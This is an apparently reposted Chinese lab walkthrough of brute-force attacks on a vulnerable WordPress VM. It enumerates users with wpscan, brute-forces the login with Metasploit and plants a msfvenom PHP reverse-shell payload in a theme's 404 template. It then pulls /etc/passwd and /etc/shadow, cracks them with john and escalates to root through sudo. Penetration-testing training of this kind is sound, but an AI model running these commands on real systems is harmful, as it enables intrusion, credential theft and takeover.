生活随笔
收集整理的這篇文章主要介紹了
暴力破解漏洞
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
暴力破解漏洞實現(xiàn)原理
暴力破解的產(chǎn)生是由于服務(wù)器沒有做限制,導(dǎo)致攻擊者可以通過暴力的手段破解所需信息,如用戶名、密碼、驗證碼等。暴力破解需要一個龐大的字典,如4位數(shù)字的驗證碼,那么暴力破解的范圍就是0000~9999,暴力破解的關(guān)鍵在于字典的大小。
靶機搭建
鏈接:https://pan.baidu.com/s/1Zw_huwIenjGTXUteftOuUw 提取碼:vuq6
漏洞復(fù)現(xiàn)
使用netdiscover發(fā)現(xiàn)存活主機
netdiscover -i eth0
使用nmap,nikto進行信息探測
nmap -sV 192.168.101.48
nikto -host http://192.168.101.48
發(fā)現(xiàn)了secret這個敏感目錄,登錄該目錄下嘗試進入login后臺失敗
修改/etc/hosts文件,添加多一條域名解析記錄就可成功訪問
首先我們必須知道該網(wǎng)站都存在哪些用戶名,我們這里使用wpscan來對該網(wǎng)站的用戶名進行暴力破解
wpscan --url http://vtcsec/secret --enumerate u
接下來我們的重頭戲來了!使用msfconsole對其密碼進行暴力窮舉
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 靶機IP
set username admin
set pass_file /usr/share/wordlists/dirb/common.txt
set targeturi /secret/
run
在利用handler模塊進行監(jiān)聽反彈shell,也是在msf中進行
back
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 本機IP
run
登錄后臺后,找到editors目錄下的404Template,使用生成的靜荷替換404模板里的內(nèi)容
msfvenom -p php/meterpreter/reverse_tcp lhost=本機IP lport=4444 -f raw
在URL中輸入以下網(wǎng)址,即可反彈shell
http://靶機IP/secret/wp-content/themes/twentyseventeen/404.php
注:這里的twentyseventeen指的是這里的小寫值
shell反彈成功,但是發(fā)現(xiàn)只是一個普通的www-data賬戶,我們輸入以下命令進入命令行界面
下載靶機的passwd和shadow散列值到kali本機的根目錄下
download /etc/passwd
download /etc/shadow
在kali本機中進行john的暴力破解,破解到了一個用戶名密碼均為marlinspike
unshadow passwd shadow > cracked
john cracked
注:這里解釋一下unshadow這個命令,這個命令是將密碼文件和密碼的散列值進行組裝的一個命令,專門配合john命令來使用的
在msf中進行提權(quán)
shell
python -c "import pty;pty.spawn('/bin/bash')"
su - marlinspike
進入marlinspike賬戶后,查看該用戶sudo能執(zhí)行的權(quán)限,發(fā)現(xiàn)是root的所有執(zhí)行權(quán)限,賺大發(fā)了!果斷使用sudo bash命令提權(quán)
總結(jié):其實暴力破解在實戰(zhàn)中也是很常用的一種方式,在滲透測試者收集到的有用信息極少極少時,便可以嘗試暴力破解的方式,但成功率完全取決于字典大小
總結(jié)
以上是生活随笔 為你收集整理的暴力破解漏洞 的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔 網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔 推薦給好友。